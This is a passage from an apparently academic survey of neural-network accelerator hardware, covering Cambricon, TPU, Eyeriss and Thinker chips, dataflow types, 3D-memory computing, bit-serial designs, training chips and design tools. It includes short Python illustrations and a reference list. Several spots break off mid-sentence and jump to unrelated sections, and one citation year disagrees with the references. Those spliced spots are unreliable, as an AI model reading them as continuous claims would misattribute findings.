Zhou et al. (2018): While Cambricon-X handled static synapse sparsity (SSS), it did not provide architectural support for static neuron sparsity (SNS) and dynamic neuron sparsity (DNS), and it incurred a large physical cost due to the IM module. To improve on this, Cambricon-S aimed at alleviating the irregularity of sparse networks through a cooperative software/hardware approach. The key observation for software-based network pruning is that larger weights after training tend to gather into small clusters, a phenomenon called "local convergence." Taking advantage of this phenomenon, irregularities in a sparse network can be greatly reduced, achieving a high compression ratio of 79× for AlexNet. Afterward, hardware modules such as the neuron selector (NSM) and the synapse selector (SSM) handle the remaining irregularity. Other architectures handling network sparsity can be found in Han et al. (2016) and Albericio et al. (2016).
Zhao et al. (2019): As machine learning became pervasive in both embedded and high-performance computing, it was inevitable to build multi-instance and many-instance machines based on the baseline Cambricon module. However, increased parallelism usually comes with increased programming complexity, as previously seen in complicated CPU and GPU APIs. To increase programming productivity, Cambricon-F introduced a fractal von Neumann architecture to iteratively manage its components. Specifically, the sub-nodes of Cambricon-F are themselves Cambricon-F instances with the same architecture and ISA; therefore, multiple hierarchies of Cambricon-F share the same software stack, alleviating the programming complexity. To demonstrate the architectural advances, two Cambricon-F instances with different scales, F100 and F1, were benchmarked against 1080Ti and DGX-1 GPUs using the famous Roofline model (Williams et al. 2009).
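For readers unfamiliar with it, the Roofline model bounds attainable performance by the compute peak and the memory bandwidth; below is a minimal sketch in which the peak and bandwidth figures are illustrative, not those of Cambricon-F or the GPUs above:

```python
def roofline(peak_flops: float, mem_bw: float, intensity: float) -> float:
    """Attainable performance (FLOP/s) under the Roofline model.

    intensity: arithmetic intensity of the kernel in FLOP per byte.
    The kernel is memory-bound below the ridge point, compute-bound above.
    """
    return min(peak_flops, mem_bw * intensity)

# Illustrative machine: 10 TFLOP/s peak, 500 GB/s memory bandwidth.
for i in [1, 10, 20, 100]:  # FLOP/byte
    print(i, roofline(10e12, 500e9, i) / 1e12, "TFLOP/s")
```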
Google TPU (Jouppi et al. 2017): Unlike the Cambricon series, which sought increased programmability, Google's Tensor Processing Unit (TPU) adopted a custom ASIC design style to increase performance. Of the three generations of TPUs, only the evaluation of the first generation was reported in detail. TPU-I targeted the acceleration of NN inference and leveraged a systolic array of 64K multipliers and 24 MB of on-chip SRAM buffers, which together accounted for 53% of the die area. It connects to the host CPU through a PCIe 3.0 bus and uses DDR3 DRAM for off-chip main memory. TPU-I was designed with a peak throughput of 92 TOPS; however, the measured performance falls far short of the peak. It was evaluated that, across various machine learning tasks, on average only 23% of the MACs were used, which gives only 21.4% of the peak throughput. The reason for such low MAC utilization is at least twofold. First, the bandwidth of DDR3 DRAM is quite low for such a server-level ASIC, which significantly limits the speed of data supply. Second, different neural networks have different access patterns for both activations and weights, which causes data access irregularities and further prolongs
the duration of memory accesses. Admitting that memory bandwidth limits the performance, TPU-II was released in 2017 with High Bandwidth Memory (HBM) technology and targeted both inference and training by supporting floating-point operations. Its average performance is 45 TFLOPS, and chips are arranged into four-chip modules with 180 TFLOPS. Sixty-four of these modules are assembled into a 256-chip pod with a performance of 11.5 PetaFLOPS. Afterward, TPU-III was announced in 2018 with twice the single-chip performance of TPU-II, while the number of deployable chips in a pod is four times larger, which gives an 8× performance boost. Details on TPU-II and TPU-III are published in Norrie et al. (2020).
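As a consistency check, the quoted 92 TOPS peak of TPU-I follows from the systolic array size and the clock rate; the 64K multipliers correspond to a 256 × 256 array, and the 700 MHz clock is the figure reported in Jouppi et al. (2017):

$$ 65{,}536\ \text{MACs} \times 2\ \frac{\text{ops}}{\text{MAC}} \times 700\ \text{MHz} \approx 91.8 \times 10^{12}\ \text{ops/s} \approx 92\ \text{TOPS} $$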
Eyeriss Series (Chen et al. 2016): The architecture papers on DianNao and the TPU do not provide implementation details. However, innovations in implementation are essential for energy-efficient design. Dataflow exploration is one of the key issues in ANN design for improving energy efficiency, and Eyeriss achieves high OPS/W through its well-known row-stationary (RS) dataflow for convolutional neural networks. RS is designed for system-level energy optimization, especially for minimizing DRAM accesses, with a four-level memory hierarchy to exploit data locality. Three forms of data reuse are maximized: convolutional reuse, filter reuse, and Ifmap reuse. The architecture also exploits the statistics of feature maps with a run-length compression (RLC) codec that compresses zero values, thereby reducing the amount of DRAM access. The data-delivery network-on-chip (NoC) cooperates with the RS dataflow for dynamic data gating, which achieves single-cycle data delivery to multiple destination PEs and saves the dynamic power of turned-off PEs. The innovative designs of Eyeriss also include distributed control logic and local storage inside the PE. However, the data-delivery NoC cannot support both high-data-reuse and high-bandwidth scenarios, which was addressed in the team's follow-up work in Chen et al. (2019). Other works on optimizing ANN dataflow include Lu et al. (2017) and Kwon et al. (2018).
Thinker Series (Yin et al. 2017): Many prototypes such as Eyeriss are designed and optimized for convolutional kernels. However, other kernels, such as recurrent, fully connected, and scalar operations, dominate the computation of networks for non-vision applications. The Thinker series of chips targets dynamic reconfiguration through a coarse-grained reconfigurable architecture (CGRA). Thinker-I leverages an output-stationary dataflow for hybrid neural networks, targeting convolutional, recurrent, and FC kernels alike. It introduces heterogeneous PE arrays, with general PEs for MAC functions and super PEs for MAC, pooling, activation, and scalar operations. PEs support bit-width-adaptive computing for both activations and weights. On-demand array partitioning (ODAP) is proposed to process hybrid networks in parallel, thus increasing resource utilization. A multibank memory system employs a fused pattern-based memory banking strategy to exploit data reuse and reduce redundant memory accesses.
Yin et al. (2018a): An energy-efficient reconfigurable processor for deep neural
networks with binary/ternary weights and 1/2/4/8/16-bit activations is implemented
Types of dataflow: Each MAC operation in an ANN typically requires three memory reads (weight, activation, and partial sum) and one memory write (the updated partial sum), so the bottleneck of ANN accelerators is normally memory access. Moreover, the energy consumed by data movement or memory access is much higher than that of computation. For example, an access to large off-chip DRAM (gigabytes) requires up to several orders of magnitude more energy than an ALU computation. To reduce the energy consumed by off-chip data movement, several levels of on-chip memory hierarchy have been introduced in ANN accelerators, including SRAM (hundreds of kilobytes) and registers (a few kilobytes). Accessing SRAM and registers consumes one and two orders of magnitude less energy than accessing DRAM, respectively (Chen et al. 2016).
Unlike in a CPU, the dataflow of an ANN accelerator is much more regular. Therefore, it is possible to design a dedicated dataflow that leverages the DRAM-SRAM-register memory hierarchy for the best energy efficiency. Three forms of local input data reuse (inside the PE array) exist in an ANN accelerator: convolutional reuse, feature map reuse, and filter reuse. For convolutional reuse, activations and filter weights are reused within a given channel. For feature map reuse, activations are reused across different filters. For filter reuse, the filter weights are reused across different activations. According to their data handling characteristics, the ANN dataflows in recent accelerators can
be briefly classified into no local reuse, weight stationary, output stationary, and row
stationary.
No local reuse: Even though accessing the local registers in a PE is energy efficient, registers are not area efficient compared with on-chip SRAM. However, a no-local-reuse dataflow increases memory traffic, since no data stays stationary inside the PE array. The ANN accelerator from UCLA (Zhang et al. 2015) and DianNao (Chen et al. 2014a) are two example designs that adopt the no-local-reuse dataflow. In Zhang et al. (2015), the filter weights, input activations, and output partial sums are buffered in the global buffer (implemented in SRAM). In DianNao (Chen et al. 2014a), the PE array reads filter weights and input activations from the global buffer; however, special registers store the partial sums to reduce the energy of partial-sum accesses.
Weight stationary: In the weight-stationary dataflow, the filter weights are read from DRAM into local registers and stay stationary across many MAC operations, minimizing the energy of reading filter weights. The weight-stationary dataflow maximizes the convolutional and filter reuse of weights. However, the input activations have to be broadcast to all PEs, and the input and output partial sums are buffered in the global buffer. One example that implements the weight-stationary dataflow is NeuFlow (Gokhale et al. 2014), where each PE has registers that keep the filter weight during processing. The input activations are broadcast to all PEs, while the partial sums are accumulated across the PEs. Some delay storage elements are required to accumulate the partial sums correctly, which increases the required local memory.
Output stationary: To minimize the energy of partial-sum movement, an output-stationary dataflow has been adopted in some ANN accelerators. In these accelerators, the accumulation of output partial sums stays stationary inside the PE array, while the filter weights are broadcast to all PEs and the input activations are streamed across the PE array. ShiDianNao (Du et al. 2015) is a typical ANN accelerator implementing the output-stationary dataflow. The PEs fetch the input activations from neighboring PEs both horizontally and vertically. Delay storage elements are also required to keep data synchronized. Global buffers hold the input activations and filter weights fetched from DRAM. There are other variants of the output-stationary dataflow that target the processing of convolutional or fully connected layers (Peemen et al. 2013).
Row stationary: The row-stationary dataflow has been proposed in Chen et al. (2016) to minimize overall energy consumption by reusing all types of data, i.e., activations, filter weights, and partial sums. Each PE is assigned a 1D row convolution, and the filter weights are kept stationary in the registers inside the PE. The input activations are streamed into the PE; these activations are reused thanks to their overlap between different sliding windows. Multiple PEs can be aggregated to process a 2D convolution. In the PE array, filter weights and activations can be reused across multiple PEs horizontally and
diagonally, respectively. The partial sums are accumulated across the PEs vertically, minimizing their data movement. The sketch below contrasts two of these dataflows as loop nests.
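As a concrete illustration, the following contrasts weight-stationary and output-stationary schedules for a 1D convolution; the 1D simplification and the array values are illustrative assumptions, not any particular accelerator's implementation:

```python
# 1D convolution y[i] = sum_k w[k] * x[i + k], written two ways to
# highlight which operand stays put in the innermost loop.

def conv1d_weight_stationary(x, w):
    y = [0.0] * (len(x) - len(w) + 1)
    for k, wk in enumerate(w):        # each weight is loaded once...
        for i in range(len(y)):       # ...and reused across all outputs
            y[i] += wk * x[i + k]
    return y

def conv1d_output_stationary(x, w):
    y = []
    for i in range(len(x) - len(w) + 1):  # each output accumulates locally,
        acc = 0.0                          # so partial sums never move
        for k, wk in enumerate(w):
            acc += wk * x[i + k]
        y.append(acc)
    return y

x, w = [1.0, 2.0, 3.0, 4.0], [1.0, -1.0]
assert conv1d_weight_stationary(x, w) == conv1d_output_stationary(x, w)
```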
Computation in 3D Memory As ANNs grow larger and deeper, overall system performance is limited by insufficient memory bandwidth and long access latency. Well-known realizations of 3D memory, such as the Hybrid Memory Cube (HMC) (Jeddeloh and Keeth 2012) and High Bandwidth Memory (HBM) (Lee et al. 2014), can potentially remove this bottleneck thanks to the massive bandwidth provided by data access through parallel memory channels, called vaults. Accordingly, a computing layer or logic die is placed at the bottom of the 3D memory stack. Computing architectures and programming paradigms for 3D memory then need to be carefully designed.
Kim et al. (2016): Neurocube is the first architecture for ANN computing in HMC. It consists of clusters of processing engines connected by a 2D mesh network as a processing tier, which is integrated in 3D with multiple tiers of DRAM. The PE clusters access multiple vaults in parallel. The operating principle, referred to as memory-centric computing, embeds specialized state machines within the vault controllers of the HMC to drive data into the PE clusters. The paper presents the basic architecture and an analysis of the logic tier synthesized in 28 nm and 15 nm process technologies.
Gao et al. (2017): TETRIS was proposed to address the architectural challenges posed by HMC and to improve the energy efficiency of a 3D memory-based ANN computing system. First, it adopted smaller on-chip buffers, used differently, to match the lower cost of main memory access. Second, it explored approaches to move operations closer to the actual memory locations. Third, it implemented a dataflow scheduling scheme whose efficiency is equivalent to the optimal schedules derived from exhaustive search. Finally, it presented a hybrid partitioning scheme that parallelizes the NN layers across the multiple vaults of the stack.
Ueyoshi et al. (2018): Although HMC and HBM provide high throughput, their access latency remains problematic and limits performance for sparse and irregular networks. QUEST is a 3D DNN engine designed for agile random data access, incorporating multi-vault SRAMs; it achieves an order of magnitude lower latency than DRAM. The 40 nm CMOS QUEST prototype has 24 processing cores running at 300 MHz, where each core is associated with one 32-bit-wide 4 MB SRAM vault. Inter-vault data communication is achieved through the ThruChip Interface (Ditzel et al. 2014), which realizes 9.6 Gb/s per vault, 28.8 GB/s combined per module, of read/write data bandwidth in a source-synchronous manner.
Judd et al. (2016): Stripes proposed the first ANN architecture whose execution time scales almost proportionally with the length of the numerical representation used. STR relies on bit-serial compute units and on the parallelism naturally present within DNNs to improve performance and energy with no accuracy loss. In addition, STR provides adaptivity, enabling on-the-fly trade-offs among accuracy, performance, and energy.
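The essence of bit-serial computation is that an n-bit operand is processed over n cycles of shift-and-add, so shorter representations finish proportionally faster; a minimal sketch of a bit-serial multiply (names and structure are illustrative, not the Stripes microarchitecture) is:

```python
def bitserial_mul(weight: int, activation: int, bits: int) -> int:
    """Multiply by feeding the activation one bit per 'cycle'.

    Each cycle adds the weight (shifted by the bit position) if the
    activation bit is set, so runtime is proportional to `bits`.
    """
    acc = 0
    for cycle in range(bits):               # one activation bit per cycle
        if (activation >> cycle) & 1:
            acc += weight << cycle          # shift-and-add
    return acc

assert bitserial_mul(5, 11, bits=4) == 55   # 4 cycles for a 4-bit activation
assert bitserial_mul(5, 3, bits=2) == 15    # 2-bit activation: half the cycles
```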
Albericio et al. (2017): While Stripes tackles the statically ineffectual bits, Pragmatic's goal is to exploit both static and dynamic zero bits. It is based on the observation that only 8% of the computation is strictly necessary for representative ANNs. Pragmatic eliminates most of the ineffectual computations on the fly by using serial-parallel shift-and-add multiplication and skipping the zero bits of the serial input. To reduce the area overhead, it incorporates several design decisions that result in a practical design.
Sharma et al. (2018): BitFusion introduces dynamic bit-level fusion/decomposition as a new dimension in the design of DNN accelerators. It consists of an array of bit-level processing elements that dynamically fuse to match the bit-width of individual DNN layers. This flexibility enables minimizing the computation and the communication at the finest possible granularity with no loss of accuracy. However, the bit-width reconfiguration incurs a large area and power overhead, as each BitBrick needs its own shift logic.
Ryu et al. (2019): BitBlade presents a precision-scalable architecture with much smaller shift-add overhead than BitFusion. BitBlade reduces the shift-add logic using a bitwise summation method: while each PE in BitFusion must have 16 variable shifters, BitBlade requires only one variable shifter per PE. A 41% reduction in area and a 36–46% reduction in energy are reported compared to BitFusion.
Computation Reuse Current ANN tasks mainly target video and audio data, which exhibit large similarity among multiple frames or within adjacent pixels of the same frame. This insight implies the possibility of computation reuse, which can be exploited to improve energy efficiency. Furthermore, reuse is not limited to the input data; intermediate feature maps can also be reused for specific kernels such as residue layers, which reduces off-chip traffic.
Riera et al. (2018): Consecutive frames in audio and video applications demand back-to-back execution of the ANN. Such inputs exhibit a high degree of similarity, causing the inputs/outputs of the different layers to be extremely similar across successive frames. It is shown that, after linear quantization, 60% of the network inputs have the same quantized value. An architecture is designed to buffer the outputs of the different layers and reuse them in the next execution.
Mahmoud et al. (2018): Besides temporal similarity, spatial correlation is also found in vision applications, especially computational imaging. Diffy exploits spatial correlation to transparently reduce the number of bits needed to store the activations and the amount of computation to perform. The key approach is differential convolution, which operates on delta values instead of the original activations. It boosts performance by 7.1× over a value-agnostic accelerator.
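The core idea of differential convolution can be sketched in a few lines: compute the first output conventionally, then obtain each subsequent output from its neighbor by convolving the (mostly small) input deltas. The 1D case and all names below are illustrative assumptions, not Diffy's implementation:

```python
def conv1d(x, w):
    return [sum(wk * x[i + k] for k, wk in enumerate(w))
            for i in range(len(x) - len(w) + 1)]

def diff_conv1d(x, w):
    """Differential convolution, simplified to 1D: the deltas between
    neighboring inputs have few effective bits for correlated data,
    and each output is recovered incrementally from the previous one.
    """
    n_out = len(x) - len(w) + 1
    delta = [b - a for a, b in zip(x, x[1:])]        # delta[m] = x[m+1] - x[m]
    y = [sum(wk * x[k] for k, wk in enumerate(w))]   # y[0] done conventionally
    for i in range(1, n_out):
        # y[i] - y[i-1] = sum_k w[k] * (x[i+k] - x[i-1+k])
        y.append(y[-1] + sum(wk * delta[i - 1 + k] for k, wk in enumerate(w)))
    return y

x, w = [4.0, 4.0, 5.0, 5.0, 6.0], [0.5, 0.5]
assert conv1d(x, w) == diff_conv1d(x, w)
```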
Azizimazreah and Chen (2019): Shortcut activations for residue layers account for 4% of the total feature map data, yet they incur a large amount of off-chip memory access and significant power consumption. This work presents an approach that "mines" the largely unexplored opportunity of reusing shortcut and feature map data to reduce off-chip traffic. It introduces logical buffers that are formed dynamically from a pool of physical buffer banks. Three procedures, namely Prolog, Kernel, and Epilog, are proposed to collaboratively allow shortcut data to be reused across any number of ANN layers.
different FPGA dies to avoid timing-critical paths that cross dies, TGPA achieves higher frequency than homogeneous designs. Experimental results show that TGPA designs achieve up to 3× latency reduction over homogeneous designs.
Jia et al. (2020): The Neural CPU is built on a binary neural network accelerator with the capability to emulate an in-order RISC-V CPU pipeline. Both general-purpose CPU and BNN operations are realized in a single core, avoiding the need for a complex communication interface. A special zero-latency transition scheme supports seamless switching between CPU and BNN modes by essentially pipelining the reconfiguration, significantly saving the latency caused by inter-core data transfer. A two-NCPU-core SoC chip was designed and fabricated in 65 nm CMOS technology.
Chen et al. (2021): Based on the observation that pre-processing and buffering can take up 80% of ANN system latency, this work targets the joint optimization of three processing stages: a frame combination module that relaxes the alignment incompatibility issue, reducing pre-processing time; a parallel img2col module that fetches activations for parallel computing threads, reducing buffering time; and three modes of batch inference for various NN layers, reducing the processing time of multiple images. Up to 75% reduction in system latency is benchmarked on selected ANNs.
Tools for ANN Design Space Exploration Designing a specific architecture, especially an ASIC, for ANNs is not a trivial task; it incorporates cross-layer knowledge spanning algorithms, architecture, and circuits. Tools for design space exploration (DSE) are intended to assist early estimation of the performance, power consumption, latency, and area cost of a given ANN, and the semiautomatic generation of implementable designs. DSE tool flows for general-purpose processors, such as nML (Freericks 1991) and LISA (Chattopadhyay et al. 2008), have been used for decades; similar DSE tool flows have recently been constructed for ANN inference.
Venkatesan et al. (2019): MAGNet stands for modular accelerator generator for neural networks. It takes a target application consisting of one or more neural networks, along with hardware constraints, as input and produces synthesizable RTL for a neural network accelerator ASIC as well as valid mappings for running the target networks on the generated hardware. MAGNet consists of three components: the MAGNet Designer, the MAGNet Mapper, and the MAGNet Tuner. The MAGNet Designer consists of a highly configurable architecture template with many design-time parameters, allowing the generation of DNN accelerators specialized for specific workloads and use cases. The MAGNet Mapper handles the mapping of different neural networks onto the generated hardware and enables the optimization of mapping strategies at run time. The MAGNet Tuner uses Bayesian optimization to rapidly explore the design space and perform hardware-software co-optimization.
Xu et al. (2020): AutoDNNchip automatically generates an optimized DNN accelerator implementation given user-defined DNN models from machine learning frameworks (e.g., PyTorch), application-driven specifications (e.g., energy and latency), and a resource budget (e.g., the size of the processing array and memories). It consists of two integrated enablers: (1) a Chip Predictor, built on top of a graph-based accelerator representation, which can accurately and efficiently predict a DNN accelerator's energy, throughput, and latency based on the DNN model parameters, hardware configuration, technology-based IPs, and platform constraints; and (2) a Chip Builder, which can automatically explore the design space of DNN chips (including IP selection, block configuration, resource balance, etc.), optimize the chip design via the Chip Predictor, and then generate synthesizable RTL code with optimized dataflows to achieve the target design metrics.
build specific designs for other ANNs, which are briefly summarized in the following.
Various techniques have been proposed to accelerate recurrent neural networks (RNNs), such as the Efficient Speech Recognition Engine (ESE) using compressed models (Han et al. 2017), a structure-based compression technique called C-LSTM (Wang et al. 2018), DeltaRNN, which takes advantage of the delta network algorithm (Gao et al. 2018), and Efficient RNN (E-RNN), based on block-circulant matrices (Li et al. 2019a).
Reinforcement learning (RL) is widely used for decision-making in automation and robotics. Accelerators have been designed with an array of stochastic synapses feeding the input and the feedback path (Amravati et al. 2018), an in-memory accelerator with the policy implemented on ferroelectric tunnel junction (FTJ) memristors (Berdan et al. 2019), an FPGA-based accelerator called FA3C (Cho et al. 2018), and an in-switch accelerator for distributed multi-node RL (Li et al. 2019b).
To accelerate Bayesian inference, researchers have proposed FPGA accelerators with the RAM-based Linear Feedback Gaussian Random Number Generator (RLF-GRNG) and the Bayesian Neural Network-oriented Wallace Gaussian Random Number Generator (Cai et al. 2018), as well as a parallel Gibbs sampling Markov random field accelerator (PGMA) (Ko et al. 2020).
The Capsule network is accelerated by PIM-CapsNet, based on processing-in-memory (PIM) with GPU and 3D-stacked technologies (Zhang et al. 2020). Super-resolution (SR) acceleration is performed by the Fast SR CNN (FSRCNN), consisting of seven convolutional layers and one deconvolutional layer (Dong et al. 2016), and by an SR-CNN processor with a global ring, four local rings, and a global ring controller (Lee et al. 2019).
3D CNNs are accelerated using a template-based architecture that unifies 2D and
3D CNNs and improves the computation using uniform templates (Shen et al. 2018)
and using a 3D CNN accelerator called Morph which fetches data from DRAM for
parallel processing with PEs (Hegde et al. 2018).
Graph Convolutional Networks (GCNs) have been accelerated by the following works: GraphACT, where the CPU and FPGA handle the communication-intensive and compute-intensive tasks, respectively (Zeng and Prasanna 2020); the Autotuning-Workload-Balancing GCN (AWB-GCN), which partitions matrices and maps them to parallel PEs to perform column-wise-product-based sparse-dense matrix multiplications (SpMMs) (Geng et al. 2020); HyGCN, with aggregation and combination engines (Yan et al. 2020); and GCNAX, which fetches data into the SMB and performs chained SpMM computations (Li et al. 2021).
Attention-based tasks are accelerated by GOBO, consisting of processing tiles whose data are supplied by a banked global buffer (Zadeh et al. 2020); A3, using algorithmic approximation with dot-product, exponent, and output modules (Ham et al. 2020); and FlexASR, with 4 PEs and a multifunction global buffer, where each PE includes a weight buffer and an input buffer that send data to perform operations of LSTM, GRU, or RNN layers (Tambe et al. 2021).
Such computing intensity not only demands significant computing resources but also requires high precision. Floating-point arithmetic units are essential in the process of backpropagation, and fixed-point approximation or customized data representations for training are still under research. Due to the high engineering cost and design complexity, state-of-the-art training chips are mostly commercial designs from large companies; below we list renowned VLSI products from three vendors.
Gwennap (2016): The Wave dataflow processor (DPU) is a training chip designed by Wave Computing. It is an ASIC fabricated in a TSMC 16 nm FinFET process. The Wave DPU features a hybrid dataflow processing architecture (combining standard instruction execution with dataflow principles) and a self-timed logic (i.e., asynchronous logic) implementation. The Wave DPU consists of 1,024 clusters, each containing 16 processing elements plus additional shared compute units. Each cluster operates asynchronously, and its peak operating frequency can be as high as 10 GHz, while a self-timed interlocking network synchronizes neighboring clusters. The chip integrates four HMC interfaces (each holding 2 GB of memory) and two 64-bit DDR4-2400 memory interfaces. A 16-lane PCI Express Gen3 interface is also included to connect to a host processor or network.
Yang (2019): Intel's training chip, the Neural Network Processor for Training (NNP-T), is a direct descendant of Nervana's original ASIC design. While the first-generation NNP-Ts were not productized, the second-generation NNP-Ts are branded as the NNP T-1000 series and are the first of these chips to be productized. Fabricated in TSMC's 16 nm process and based on the Spring Crest microarchitecture, these chips feature several enhancements and refinements over the prior generation, including a shift from Flexpoint to Bfloat16 and a considerable performance uplift. Intel claims that these chips have about 3–4× the training performance of the first generation. All NNP-T 1000 chips come with 32 GB of HBM2 in four stacks in a CoWoS package and come in two form factors: a PCIe Gen 3 card and an OCP OAM accelerator card.
Jouppi et al. (2020): The first generation of Google's Tensor Processing Unit (TPU), TPUv1, is an inference chip, while TPUv2, TPUv3, and TPUv4 are training chips. Taking TPUv2 as an example, each chip contains two TensorCores (not related to the Tensor Cores of NVIDIA GPUs). A TensorCore consists of an Inter-Core Interconnect, HBM, the Core Sequencer, the Vector Processing Unit, the MXU, which produces 32-bit FP products from 16-bit FP inputs, and the Transpose Reduction Permute Unit. Up to 256 TPUv2 chips can be connected through a 2D-torus topology to create a supercomputer for training. The peak performance of a TPUv2 chip is 46 TeraFLOPS (in 16 bits) or 3 TeraFLOPS (in 32 bits), and its thermal design power is 280 W per chip.
NVIDIA (2017): The NVIDIA Deep Learning Accelerator (NVDLA) is an open-source
hardware design for deep learning inference. Its Verilog model is a
synthesis and simulation model in RTL form, and the TLM SystemC simulation
model can be used for software development, system integration, and testing. The
NVDLA software ecosystem includes an on-device software stack, a full training
infrastructure to build new models that incorporate deep learning, and parsers that
convert existing models to a form that is usable by the on-device software. NVDLA
is open-source at https://github.com/nvdla
Moreau et al. (2019): The Versatile Tensor Accelerator (VTA) is an open, generic,
and customizable deep learning accelerator with a complete TVM-based compiler
stack. VTA is designed to expose the most salient and common characteristics of
mainstream deep learning accelerators. Together TVM and VTA form an end-to-
end hardware-software deep learning system stack that includes hardware design,
drivers, a JIT runtime, and an optimizing compiler stack based on TVM. VTA is
open-source at https://github.com/apache/tvm/
Xu et al. (2020): As introduced in the DSE subsection, the design exploration tool
by Rice University is open-sourced at https://github.com/RICE-EIC/AutoDNNchip.git
A parallel digital VLSI architecture is proposed to deal with SVM training and
classification (Wang et al. 2014). The architecture splits data into multiple basic
SVM units capable of processing variable data size with distributed cache memory.
The communication is performed via a multilayer system bus that minimizes
communication overhead.
Conclusions
With the emerging demand from not only neuroscience research but also commercial
tasks like classification and recognition, various architectures for accelerating AI
algorithms, including neuromorphic computing/SNNs and ANNs, have been proposed.
Large-scale neuromorphic chips with complex neuronal mechanisms, such as
SpiNNaker, Neurogrid, and BrainScaleS, have been built for simulation of the
biological brain. Also, many neuromorphic chips, such as TrueNorth, Loihi, ODIN,
and Tianjic, have been designed based on simplified neural and synaptic primi-
tives to perform commercial tasks. These neuromorphic chips, built with analog
circuits or synchronous or asynchronous digital circuits, can achieve extremely
low-power consumption thanks to the event-driven characteristic of neuromorphic
computing. In terms of algorithms, software frameworks, and dedicated hardware,
real-valued artificial neural networks with simple models are more practical
than neuromorphic computing. When designing an architecture for ANNs, several
design metrics have to be considered, including accuracy, performance, power
References
Akopyan F, Sawada J, Cassidy A, Alvarez-Icaza R, Arthur J, Merolla P, Imam N, Nakamura
Y, Datta P, Nam GJ, Taba B (2015) TrueNorth: design and tool flow of a 65 mW 1 million
neuron programmable neurosynaptic chip. IEEE Trans Comput-Aided Des Integr Circuits Syst
34(10):1537–1557
Albericio J, Judd P, Hetherington T, Aamodt T, Jerger NE, Moshovos A (2016) Cnvlutin:
ineffectual-neuron-free deep neural network computing. ACM SIGARCH Comput Archit News
44(3):1–13
Albericio J, Delmás A, Judd P, Sharify S, O’Leary G, Genov R, Moshovos A (2017) Bit-pragmatic
deep neural network computing. In: Proceedings of the 50th Annual IEEE/ACM International
Symposium on Microarchitecture, pp 382–394
Amravati A, Nasir SB, Thangadurai S, Yoon I, Raychowdhury A (2018) A 55nm time-domain
mixed-signal neuromorphic accelerator with stochastic synapses and embedded reinforcement
learning for autonomous micro-robots. In: 2018 IEEE International Solid-State Circuits
Conference-(ISSCC). IEEE, pp 124–126
Anwani N, Rajendran B (2015) Normad-normalized approximate descent based supervised
learning rule for spiking neurons. In 2015 international joint conference on neural networks
(IJCNN). IEEE, pp 1–8
Azizimazreah A, Chen L (2019) Shortcut mining: exploiting cross-layer shortcut reuse in
dcnn accelerators. In: 2019 IEEE International Symposium on High Performance Computer
Architecture (HPCA). IEEE, pp 94–105
Benjamin BV, Gao P, McQuinn E, Choudhary S, Chandrasekaran AR, Bussat JM, Alvarez-Icaza R,
Arthur JV, Merolla PA, Boahen K (2014) Neurogrid: a mixed-analog-digital multichip system
for large-scale neural simulations. Proc IEEE 102(5):699–716
Berdan R, Marukame T, Kabuyanagi S, Ota K, Saitoh M, Fujii S (2019) In-memory reinforcement
learning with moderately stochastic conductance switching of ferroelectric tunnel junctions. In:
Proceeding Symposium on VLSI Technology, pp 22–23
Bi GQ, Poo MM (1998) Synaptic modifications in cultured hippocampal neurons: dependence on
spike timing, synaptic strength, and postsynaptic cell type. J Neurosci 18(24):10464–10472
Bo D et al (2021) OR-ML: enhancing reliability for machine learning accelerator with
opportunistic redundancy. In: 2021 IEEE Design, Automation and Test in Europe Conference (DATE)
Bohte SM, Kok JN, La Poutre H (2002) Error-backpropagation in temporally encoded networks of
spiking neurons. Neurocomputing 48(1–4):17–37
Brader JM, Senn W, Fusi S (2007) Learning real-world stimuli in a neural network with spike-
driven synaptic dynamics. Neural Comput 19(11):2881–2912
Buckler M, Bedoukian P, Jayasuriya S, Sampson A (2018) EVA2: exploiting temporal redundancy
in live computer vision. In: 2018 ACM/IEEE 45th Annual International Symposium on
Computer Architecture (ISCA). IEEE, pp 533–546
Cai R, Ren A, Liu N, Ding C, Wang L, Qian X, Pedram M, Wang Y (2018) Vibnn: hardware
acceleration of Bayesian neural networks. ACM SIGPLAN Not 53(2):476–488
Cai H, Gan C, Wang T, Zhang Z, Han S (2019) Once-for-all: train one network and specialize it
for efficient deployment. arXiv preprint arXiv:1908.09791
Chakradhar S, Sankaradas M, Jakkula V, Cadambi S (2010) A dynamically configurable copro-
cessor for convolutional neural networks. In: Proceedings of the 37th Annual International
Symposium on Computer Architecture, pp 247–257
Chattopadhyay A, Meyr H, Leupers R (2008) LISA: a uniform ADL for embedded processor mod-
eling, implementation, and software toolsuite generation. In: Processor description languages.
Morgan Kaufmann, San Francisco, pp 95–132
Chen T, Du Z, Sun N, Wang J, Wu C, Chen Y, Temam O (2014a) Diannao: a small-footprint high-
throughput accelerator for ubiquitous machine-learning. ACM SIGARCH Comput Archit News
42(1):269–284
Chen Y, Luo T, Liu S, Zhang S, He L, Wang J, Li L, Chen T, Xu Z, Sun N, Temam O (2014b)
Dadiannao: a machine-learning supercomputer. In: 2014 47th Annual IEEE/ACM International
Symposium on Microarchitecture. IEEE, pp 609–622
Chen YH, Emer J, Sze V (2016) Eyeriss: a spatial architecture for energy-efficient dataflow for
convolutional neural networks. ACM SIGARCH Comput Archit News 44(3):367–379
Chen T, Moreau T, Jiang Z, Zheng L, Yan E, Shen H, Cowan M, Wang L, Hu Y, Ceze L, Guestrin C
(2018) TVM: an automated end-to-end optimizing compiler for deep learning. In: 13th USENIX
Symposium on Operating Systems Design and Implementation (OSDI 18), pp 578–594
Chen Y-H, Yang T-J, Emer J, Sze V (2019) Eyeriss v2: a flexible accelerator for emerging deep
neural networks on mobile devices. IEEE J Emerg Sel Top Circuits Syst 9(2):292–308
Chen Y, Xie Y, Song L, Chen F, Tang T (2020) A survey of accelerator architectures for deep neural
networks. Engineering 6(3):264–274
Chen W et al (2021) Improving system latency of AI accelerator with on-chip pipelined activation
preprocessing and multi-mode batch inference. In: IEEE International Conference on Artificial
Intelligence Circuits and Systems. IEEE
Chetlur S, Woolley C, Vandermersch P, Cohen J, Tran J, Catanzaro B, Shelhamer E (2014) cudnn:
efficient primitives for deep learning. arXiv preprint arXiv:1410.0759
Chicca E, Stefanini F, Bartolozzi C, Indiveri G (2014) Neuromorphic electronic circuits for
building autonomous cognitive systems. Proc IEEE 102(9):1367–1388
Cho H, Oh P, Park J, Jung W, Lee J (2019) Fa3c: FPGA-accelerated deep reinforcement learning.
In: Proceedings of the Twenty-Fourth International Conference on Architectural Support for
Programming Languages and Operating Systems, pp 499–513
Coates A, Huval B, Wang T, Wu D, Catanzaro B, Andrew N (2013) Deep learning with COTS
HPC systems. In: International Conference on Machine Learning. PMLR, pp 1337–1345
